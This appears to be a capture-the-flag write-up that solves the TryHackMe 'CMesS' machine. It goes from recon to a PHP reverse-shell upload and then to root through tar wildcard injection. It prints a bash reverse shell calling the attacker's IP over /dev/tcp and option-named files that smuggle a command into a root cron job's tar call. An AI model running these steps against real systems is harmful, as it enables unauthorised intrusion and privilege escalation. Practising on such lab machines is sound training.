Hello, in this post I will walk through the solution of the machine called "CMesS" on the TryHackMe platform. Enjoy the read…
Solution
1 — I add the domain name "cmess.thm" to the /etc/hosts file.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "10.10.22.47 cmess.thm" | tee -a /etc/hosts
10.10.22.47 cmess.thm
2 — Using Nmap, I gather detailed information about the open ports and services on the machine.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sS -sV 10.10.22.47
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-25 06:50 EDT
Nmap scan report for 10.10.22.47
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3 — I run a subdomain scan with FFUF and find the subdomain "dev.cmess.thm".
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -mc 200
*CENSORED*
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "10.10.22.47 dev.cmess.thm" | tee -a /etc/hosts
10.10.22.47 dev.cmess.thm
4 — When I visit "dev.cmess.thm", I find the login credentials of the user named andre.
## Development Log
### andre@cmess.thm
Have you guys fixed the bug that was found on live?
### support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
### support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
### andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
### support@cmess.thm
Your password has been reset. Here: *CENSORED*
5 — I run a directory scan.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cmess.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/25 07:09:01 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/0 (Status: 200) [Size: 3851]
/01 (Status: 200) [Size: 4078]
/1 (Status: 200) [Size: 4078]
/1x1 (Status: 200) [Size: 4078]
/About (Status: 200) [Size: 3339]
/about (Status: 200) [Size: 3353]
/admin (Status: 200) [Size: 1580]
/api (Status: 200) [Size: 0]
/assets (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
/author (Status: 200) [Size: 3590]
/blog (Status: 200) [Size: 3851]
/category (Status: 200) [Size: 3862]
/cm (Status: 500) [Size: 0]
/feed (Status: 200) [Size: 735]
/fm (Status: 200) [Size: 0]
/index (Status: 200) [Size: 3851]
/Index (Status: 200) [Size: 3851]
/lib (Status: 301) [Size: 312] [--> http://cmess.thm/lib/?url=lib]
/log (Status: 301) [Size: 312] [--> http://cmess.thm/log/?url=log]
/login (Status: 200) [Size: 1580]
/robots.txt (Status: 200) [Size: 65]
/search (Status: 200) [Size: 3851]
/Search (Status: 200) [Size: 3851]
/server-status (Status: 403) [Size: 274]
/sites (Status: 301) [Size: 316] [--> http://cmess.thm/sites/?url=sites]
/src (Status: 301) [Size: 312] [--> http://cmess.thm/src/?url=src]
/tags (Status: 200) [Size: 3139]
/tag (Status: 200) [Size: 3874]
/themes (Status: 301) [Size: 318] [--> http://cmess.thm/themes/?url=themes]
/tmp (Status: 301) [Size: 312] [--> http://cmess.thm/tmp/?url=tmp]
6 — I go to the admin directory and log in with andre's credentials. Then, from the "Content" section, I open the "File Manager" tab. I upload a PHP reverse shell and obtain a connection.
http://cmess.thm/assets/shell.php
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.94.51] from (UNKNOWN) [10.10.22.47] 59342
Linux cmess 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:10:53 up 23 min, 0 users, load average: 0.22, 0.81, 0.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
7 — In the "/opt" directory I find a file named ".password.bak". This file contains the password of the user andre. I switch to the andre user and obtain the first flag.
www-data@cmess:/home$ cd /opt
cd /opt
www-data@cmess:/opt$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 22 root root 4096 Feb 6 2020 ..
-rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
cat .password.bak
andres backup password
UQfsdCB7aAP6
www-data@cmess:/opt$ su andre
su andre
Password: *CENSORED*
andre@cmess:/opt$ cd /home/andre
cd /home/andre
andre@cmess:~$ ls
ls
backup user.txt
andre@cmess:~$ cat user.txt
cat user.txt
*CENSORED*
8 — When I inspect the cron table, I see that the "/home/andre/backup" directory is compressed with tar and copied to the /tmp directory every two minutes as root.
andre@cmess:~$ cd backup
cd backup
andre@cmess:~/backup$ ls
ls
note
andre@cmess:~/backup$ ls -la
ls -la
total 12
drwxr-x--- 2 andre andre 4096 Feb 9 2020 .
drwxr-x--- 4 andre andre 4096 Feb 9 2020 ..
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note
andre@cmess:~/backup$ cat note
cat note
Note to self.
Anything in here will be backed up!
andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
9 — Here I use the "Tar Wildcard Injection" attack. It works because the shell expands the `*` before tar runs, so a file whose name looks like a tar option is passed to tar as an argument and interpreted as an option rather than as a file name. I create a script called shell.sh containing a bash reverse shell command. Then I create the required option-named files and wait for the connection.
andre@cmess:~/backup$ cat > shell.sh << EOF
cat > shell.sh << EOF
> #!/bin/bash
#!/bin/bash
> bash -i >& /dev/tcp/10.8.94.51/4445 0>&1
bash -i >& /dev/tcp/10.8.94.51/4445 0>&1
> EOF
EOF
andre@cmess:~/backup$ chmod +x shell.sh
chmod +x shell.sh
andre@cmess:~/backup$ echo "" > "/home/andre/backup/--checkpoint=1"
echo "" > "/home/andre/backup/--checkpoint=1"
andre@cmess:~/backup$ echo "" > "/home/andre/backup/--checkpoint-action=exec=sh shell.sh"
echo "" > "/home/andre/backup/--checkpoint-action=exec=sh shell.sh"
10 — After switching to the root user, I obtain my second flag.
root@cmess:/home/andre/backup# cat /root/root.txt
*CENSORED*